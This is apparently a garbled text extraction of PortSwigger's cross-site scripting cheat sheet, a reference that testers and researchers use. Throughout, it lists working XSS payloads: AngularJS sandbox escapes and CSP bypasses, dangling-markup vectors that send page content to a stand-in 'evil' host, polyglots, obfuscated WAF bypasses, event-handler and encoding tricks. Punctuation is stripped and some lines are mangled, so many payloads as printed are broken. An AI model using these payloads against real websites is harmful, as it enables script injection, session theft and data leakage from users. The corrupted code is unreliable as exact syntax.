159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
onseeked
Requires clicking the element timeline ltaudio autoplay controls onseeked=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onseeking
Requires clicking the element timeline ltaudio autoplay controls onseeking=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onselect
Requires you select text ltinput onselect=alert(1) value=XSS autofocusgtCompatibility
onselectionchange
Fires when text selection is changed onthe page
ltbody onselectionchange=alert(1)gtselect some textCompatibility
onselectstart
Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility
onshow
Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt
Compatibility
onsubmit
Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility
ontouchend
Fires when the touch screen only mobiledevice
ltbody ontouchend=alert(1)gt Compatibility
ontouchmove
Fires when the touch screen and moveonly mobile device
ltbody ontouchmove=alert(1)gt Compatibility
ontouchstart
Fires when the touch screen only mobiledevice
ltbody ontouchstart=alert(1)gt Compatibility
onvolumechange
Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onwheel
Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility
Restricted characters
No parentheses using exception handling ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons
ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons using expressions
ltscriptgtthrow onerror=alert1ltscriptgt
No parentheses using exception handling and eval ltscriptgtthrow onerror=eval=alertx281x29ltscriptgt
No parentheses using exception handling and evalon Firefox
ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval
ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval without
ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt
No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt
No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt
No parentheses using template strings ltscriptgtalert`1`ltscriptgt
No parentheses using template strings and locationhash
ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt
No parentheses or spaces using template stringsand location hash
ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt
Frameworks
Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt
Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt
Protocols
Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt
Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt
Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt
A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt
The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt
Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed inside theprotocol
lta href=javas criptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed after protocolname before the colon
lta href=javascript alert(1)gtXSSltagt
Xlink namespace inside SVG with JavaScriptprotocol
ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
to 1 a id xss text x 20 y 20 XSS text a
SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt
SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt
SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt
Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt
Base tag with JavaScript protocol rewriting relativeURLS
ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt
MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah
Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS
Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt
Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt
Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt
Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Other useful attributes
Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt
Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt
Click a submit element from anywhere on the pageeven outside the form
ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt
Hidden inputs Access key attributes can enableXSS on normally unexploitable elements
ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements Access key attributes can enableXSS on normally unexploitable elements
ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the currentwebpage
lta href= download=filenamehtmlgtTestltagt
Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt
Set windowname via parameter on the windowopenfunction
lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt
Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
